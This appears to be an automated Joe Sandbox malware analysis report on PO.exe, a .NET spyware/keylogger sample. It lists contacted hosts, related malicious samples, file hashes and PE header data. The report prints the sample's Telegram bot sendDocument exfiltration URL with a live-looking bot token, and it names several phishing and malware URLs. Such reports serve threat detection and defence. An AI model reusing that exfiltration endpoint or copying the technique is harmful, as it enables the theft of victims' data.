                                                                                            http://go.microsoft.cRegAsm.exe, 00000002.00000002.4145529270.0000000000B30000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://api.telegram.orgdRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://www.fonts.comPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.sandoll.co.krPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://api.telegram.org/bot7825959937:AAEuKj4hp2JK5DXFcnVH39_e6ViQFWstbqY/sendDocument?chat_id=6023RegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://checkip.dyndns.comRegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.urwpp.deDPleasePO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://www.zhongyicts.com.cnPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://api.telegram.orgRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://checkip.dyndns.org/dRegAsm.exe, 00000002.00000002.4146303325.0000000002985000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000002.00000002.4146303325.0000000002861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.sakkal.comPO.exe, 00000000.00000002.1689357430.00000000067C2000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 00000000.00000002.1688975226.00000000056F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://api.telegram.org/bot-/sendDocument?chat_id=PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://reallyfreegeoip.org/xml/PO.exe, 00000000.00000002.1683472703.0000000003499000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4146303325.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.4145197098.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      • No. of IPs < 25%
                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                      • 75% < No. of IPs
                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                      149.154.167.220
                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                      104.21.112.1
                                                                                                                      reallyfreegeoip.orgUnited States
                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                      193.122.6.168
                                                                                                                      checkip.dyndns.comUnited States
                                                                                                                      31898ORACLE-BMC-31898USfalse
                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                      Analysis ID:1586218
                                                                                                                      Start date and time:2025-01-08 21:10:05 +01:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 7m 22s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                      Number of analysed new started processes analysed:7
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:PO.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      HCA Information:
                                                                                                                      • Successful, ratio: 100%
                                                                                                                      • Number of executed functions: 26
                                                                                                                      • Number of non-executed functions: 1
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded IPs from analysis (whitelisted): 23.56.254.164, 4.245.163.56, 13.107.246.45
                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                      • VT rate limit hit for: PO.exe
                                                                                                                      TimeTypeDescription
                                                                                                                      15:11:05API Interceptor10024736x Sleep call for process: RegAsm.exe modified
                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                      149.154.167.220BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                  random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                    random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          104.21.112.1wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                          • 838596cm.nyafka.top/lineLongpolllinuxFlowercentraluploads.php
                                                                                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                          • beammp.com/phpmyadmin/
                                                                                                                                          193.122.6.168New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          file.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                          • checkip.dyndns.org/
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          checkip.dyndns.comBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 132.226.247.73
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 193.122.6.168
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 132.226.8.169
                                                                                                                                          reallyfreegeoip.orgBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 188.114.96.3
                                                                                                                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 188.114.97.3
                                                                                                                                          api.telegram.orgBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          ORACLE-BMC-31898USBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          miori.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 140.204.251.205
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 193.122.130.0
                                                                                                                                          FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          fiyati_teklif 615TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 158.101.44.242
                                                                                                                                          Fantazy.i686.elfGet hashmaliciousUnknownBrowse
                                                                                                                                          • 193.123.7.176
                                                                                                                                          fuckunix.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                          • 144.25.181.0
                                                                                                                                          TELEGRAMRUBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          proforma invoice pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          random.exeGet hashmaliciousCStealerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, StealcBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          CLOUDFLARENETUShttps://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.22.16.141
                                                                                                                                          https://google.com/amp/s/theoralbibleschool.com%2Fbendighyti%2Flocalkenej%2FP%2Fc29tZW9uZUB3aGF0LmNvbQGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 172.67.169.197
                                                                                                                                          ZipThis.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          https://clicktoviewdocumentonadovemacroreader.federalcourtbiz.com/lhvBR/?e=amFtZXMuYm9zd2VsbEBvdmVybGFrZWhvc3BpdGFsLm9yZw==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          VM_MSG-Gf.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          https://workdrive.zohopublic.com/writer/open/p369v1c9203e54b114ff78bf68159454d9c26Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          https://workdrive.zohopublic.com/writer/open/p369v39db425d23f84b09b5751cf359b081f4Get hashmaliciousUnknownBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          https://eldivan.mx/?data=c2dlcmplc0BmaXJzdGFyLWJhbmsuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 104.17.25.14
                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          54328bd36c14bd82ddaa0c04b25ed9adBgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          VSLS SCHEDULE_pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          ungziped_file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          fatura098002.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          Mv XIN HAI TONG 21_VESSEL'S_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          New order 2025.msgGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          ENQ-0092025.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 104.21.112.1
                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eZipThis.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          EZZGTmJj4O.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          BgroUcYHpy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          https://my.remarkable.com/Get hashmaliciousUnknownBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          pbCN4g6sN5.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          HVSU7GbA5N.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          oagkiAhXgZ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          z.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                          • 149.154.167.220
                                                                                                                                          No context
                                                                                                                                          Process:C:\Users\user\Desktop\PO.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1119
                                                                                                                                          Entropy (8bit):5.345080863654519
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                                                          MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                                                          Malicious:true
                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Entropy (8bit):7.728605988724559
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                          File name:PO.exe
                                                                                                                                          File size:205'312 bytes
                                                                                                                                          MD5:317fe502da9a45f02eb78096e44ff70d
                                                                                                                                          SHA1:2077bc7190dcfd8266aba95f73f838851b2c66db
                                                                                                                                          SHA256:b8c8a5c0f597a8d34813ce8f5e6a24832ccdad7bd0fa76e3d1f9adaf4639e795
                                                                                                                                          SHA512:cce45c0ecdd040586564c73611345650b6f91fb25f93abf3806063ad7557ad1ada46cacbcdd48a6ce308853a9e3abdf78b8893bd7ff470167282957ac2d8ab88
                                                                                                                                          SSDEEP:3072:uXjI4IweUBbWrT1KS2pgOjUndGOFI1JEJ2WTi5Lg/N2FF:uTI6evHugOjwXI8J2Vg
                                                                                                                                          TLSH:7D14C3A30DA48690FB65CD365E7C7BE1B2DBDA03FCB1A906134C1C87485A272369E275
                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ZA................0..............7... ...@....@.. ....................................@................................
                                                                                                                                          Icon Hash:90cececece8e8eb0
                                                                                                                                          Entrypoint:0x43371e
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                          Time Stamp:0x827F415A [Thu May 19 00:31:22 2039 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:4
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:4
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:4
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                          Instruction
                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          add byte ptr [eax], al
                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x336c40x57.text
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000x586.rsrc
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x360000xc.reloc
